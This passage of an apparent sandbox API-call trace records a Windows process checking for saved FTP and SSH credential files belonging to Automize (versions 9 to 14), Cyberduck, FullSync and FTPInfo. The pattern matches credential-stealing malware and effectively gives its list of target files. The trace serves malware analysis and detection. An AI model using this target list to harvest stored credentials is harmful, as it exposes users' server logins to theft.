(x86)\\Automize8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.507] GetProcessHeap () returned 0x6a0000 [0128.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.508] GetProcessHeap () returned 0x6a0000 [0128.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.509] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.509] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize9\\encPwd.jsd") returned 43 [0128.510] GetProcessHeap () returned 0x6a0000 [0128.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5a) returned 0x6b9518 [0128.510] GetProcessHeap () returned 0x6a0000 [0128.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.511] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.511] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\encPwd.jsd") returned 0 [0128.512] GetProcessHeap () returned 0x6a0000 [0128.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.512] GetProcessHeap () returned 0x6a0000 [0128.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.513] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.514] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize9\\data\\settings\\sshProfiles-j.jsd") returned 64 [0128.514] GetProcessHeap () returned 0x6a0000 [0128.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x84) returned 0x6bac30 [0128.514] GetProcessHeap () returned 0x6a0000 [0128.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.515] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.515] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.516] GetProcessHeap () returned 0x6a0000 [0128.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.516] GetProcessHeap () returned 0x6a0000 [0128.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.517] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.517] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize9\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0128.517] GetProcessHeap () returned 0x6a0000 [0128.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x84) returned 0x6bac30 [0128.517] GetProcessHeap () returned 0x6a0000 [0128.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.519] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.519] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.519] GetProcessHeap () returned 0x6a0000 [0128.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.520] GetProcessHeap () returned 0x6a0000 [0128.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.521] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.521] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize10\\encPwd.jsd") returned 44 [0128.521] GetProcessHeap () returned 0x6a0000 [0128.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5c) returned 0x6b9518 [0128.521] GetProcessHeap () returned 0x6a0000 [0128.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.523] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.523] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\encPwd.jsd") returned 0 [0128.523] GetProcessHeap () returned 0x6a0000 [0128.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.523] GetProcessHeap () returned 0x6a0000 [0128.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.524] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.524] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize10\\data\\settings\\sshProfiles-j.jsd") returned 65 [0128.524] GetProcessHeap () returned 0x6a0000 [0128.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x86) returned 0x6bac30 [0128.525] GetProcessHeap () returned 0x6a0000 [0128.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.526] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.526] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.526] GetProcessHeap () returned 0x6a0000 [0128.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.526] GetProcessHeap () returned 0x6a0000 [0128.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.527] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.528] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize10\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0128.528] GetProcessHeap () returned 0x6a0000 [0128.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x86) returned 0x6bac30 [0128.528] GetProcessHeap () returned 0x6a0000 [0128.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.529] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.530] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.530] GetProcessHeap () returned 0x6a0000 [0128.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.530] GetProcessHeap () returned 0x6a0000 [0128.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.531] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.532] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize11\\encPwd.jsd") returned 44 [0128.532] GetProcessHeap () returned 0x6a0000 [0128.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5c) returned 0x6b9518 [0128.532] GetProcessHeap () returned 0x6a0000 [0128.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.533] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.533] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\encPwd.jsd") returned 0 [0128.534] GetProcessHeap () returned 0x6a0000 [0128.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.534] GetProcessHeap () returned 0x6a0000 [0128.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.535] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.536] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize11\\data\\settings\\sshProfiles-j.jsd") returned 65 [0128.536] GetProcessHeap () returned 0x6a0000 [0128.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x86) returned 0x6bac30 [0128.536] GetProcessHeap () returned 0x6a0000 [0128.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.537] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.537] GetProcessHeap () returned 0x6a0000 [0128.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.538] GetProcessHeap () returned 0x6a0000 [0128.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.538] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.539] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize11\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0128.539] GetProcessHeap () returned 0x6a0000 [0128.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x86) returned 0x6bac30 [0128.539] GetProcessHeap () returned 0x6a0000 [0128.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.540] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.540] GetProcessHeap () returned 0x6a0000 [0128.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.541] GetProcessHeap () returned 0x6a0000 [0128.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.542] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.543] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize12\\encPwd.jsd") returned 44 [0128.543] GetProcessHeap () returned 0x6a0000 [0128.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5c) returned 0x6b9518 [0128.543] GetProcessHeap () returned 0x6a0000 [0128.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.545] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\encPwd.jsd") returned 0 [0128.545] GetProcessHeap () returned 0x6a0000 [0128.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.546] GetProcessHeap () returned 0x6a0000 [0128.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.546] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.547] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize12\\data\\settings\\sshProfiles-j.jsd") returned 65 [0128.547] GetProcessHeap () returned 0x6a0000 [0128.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x86) returned 0x6bac30 [0128.547] GetProcessHeap () returned 0x6a0000 [0128.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.548] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.549] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.549] GetProcessHeap () returned 0x6a0000 [0128.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.549] GetProcessHeap () returned 0x6a0000 [0128.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.550] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.551] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize12\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0128.551] GetProcessHeap () returned 0x6a0000 [0128.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x86) returned 0x6bac30 [0128.551] GetProcessHeap () returned 0x6a0000 [0128.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.552] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.552] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.552] GetProcessHeap () returned 0x6a0000 [0128.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.553] GetProcessHeap () returned 0x6a0000 [0128.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.554] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.554] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize13\\encPwd.jsd") returned 44 [0128.554] GetProcessHeap () returned 0x6a0000 [0128.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5c) returned 0x6b9518 [0128.555] GetProcessHeap () returned 0x6a0000 [0128.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.556] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\encPwd.jsd") returned 0 [0128.556] GetProcessHeap () returned 0x6a0000 [0128.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.556] GetProcessHeap () returned 0x6a0000 [0128.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.557] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.558] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize13\\data\\settings\\sshProfiles-j.jsd") returned 65 [0128.558] GetProcessHeap () returned 0x6a0000 [0128.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x86) returned 0x6bac30 [0128.558] GetProcessHeap () returned 0x6a0000 [0128.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.559] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.559] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.560] GetProcessHeap () returned 0x6a0000 [0128.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.560] GetProcessHeap () returned 0x6a0000 [0128.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.561] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.562] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize13\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0128.562] GetProcessHeap () returned 0x6a0000 [0128.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x86) returned 0x6bac30 [0128.562] GetProcessHeap () returned 0x6a0000 [0128.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.563] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.563] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.564] GetProcessHeap () returned 0x6a0000 [0128.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.564] GetProcessHeap () returned 0x6a0000 [0128.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.565] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.566] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize14\\encPwd.jsd") returned 44 [0128.566] GetProcessHeap () returned 0x6a0000 [0128.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5c) returned 0x6b9518 [0128.566] GetProcessHeap () returned 0x6a0000 [0128.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.567] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\encPwd.jsd") returned 0 [0128.567] GetProcessHeap () returned 0x6a0000 [0128.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.568] GetProcessHeap () returned 0x6a0000 [0128.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.568] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.569] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize14\\data\\settings\\sshProfiles-j.jsd") returned 65 [0128.569] GetProcessHeap () returned 0x6a0000 [0128.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x86) returned 0x6bac30 [0128.569] GetProcessHeap () returned 0x6a0000 [0128.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.570] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.571] GetProcessHeap () returned 0x6a0000 [0128.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.571] GetProcessHeap () returned 0x6a0000 [0128.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.572] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.572] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize14\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0128.572] GetProcessHeap () returned 0x6a0000 [0128.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x86) returned 0x6bac30 [0128.572] GetProcessHeap () returned 0x6a0000 [0128.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.574] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.574] GetProcessHeap () returned 0x6a0000 [0128.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.574] GetProcessHeap () returned 0x6a0000 [0128.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0128.575] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.575] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0128.576] GetProcessHeap () returned 0x6a0000 [0128.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f58) returned 0x6bb458 [0128.576] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.577] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\Cyberduck", arglist=0x19fb88 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cyberduck") returned 47 [0128.577] GetProcessHeap () returned 0x6a0000 [0128.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x62) returned 0x6b9518 [0128.577] GetProcessHeap () returned 0x6a0000 [0128.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.580] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.580] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cyberduck") returned 0 [0128.581] GetProcessHeap () returned 0x6a0000 [0128.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.581] GetProcessHeap () returned 0x6a0000 [0128.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.582] GetProcessHeap () returned 0x6a0000 [0128.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0128.583] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.583] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0128.583] GetProcessHeap () returned 0x6a0000 [0128.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6bb458 [0128.584] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.584] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\iterate_GmbH", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\iterate_GmbH") returned 50 [0128.585] GetProcessHeap () returned 0x6a0000 [0128.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x68) returned 0x6b9518 [0128.585] GetProcessHeap () returned 0x6a0000 [0128.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.586] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.587] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\iterate_GmbH") returned 0 [0128.587] GetProcessHeap () returned 0x6a0000 [0128.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.587] GetProcessHeap () returned 0x6a0000 [0128.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.588] GetProcessHeap () returned 0x6a0000 [0128.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0128.589] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0128.590] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0128.601] GetProcessHeap () returned 0x6a0000 [0128.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6bb458 [0128.603] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.605] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\.config\\fullsync\\profiles.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\.config\\fullsync\\profiles.xml") returned 51 [0128.605] GetProcessHeap () returned 0x6a0000 [0128.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6a) returned 0x6b9518 [0128.605] GetProcessHeap () returned 0x6a0000 [0128.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.608] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.608] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\.config\\fullsync\\profiles.xml") returned 0 [0128.608] GetProcessHeap () returned 0x6a0000 [0128.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.609] GetProcessHeap () returned 0x6a0000 [0128.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.609] GetProcessHeap () returned 0x6a0000 [0128.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f72) returned 0x6bb458 [0128.611] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.612] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\FTPInfo\\ServerList.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.xml") returned 60 [0128.612] GetProcessHeap () returned 0x6a0000 [0128.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7c) returned 0x6b9518 [0128.612] GetProcessHeap () returned 0x6a0000 [0128.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.614] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.xml") returned 0 [0128.615] GetProcessHeap () returned 0x6a0000 [0128.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.615] GetProcessHeap () returned 0x6a0000 [0128.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f72) returned 0x6bb458 [0128.616] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.618] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\FTPInfo\\ServerList.cfg", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.cfg") returned 60 [0128.618] GetProcessHeap () returned 0x6a0000 [0128.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7c) returned 0x6b9518 [0128.618] GetProcessHeap () returned 0x6a0000 [0128.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.621] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.cfg") returned 0 [0128.621] GetProcessHeap () returned 0x6a0000 [0128.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.622] 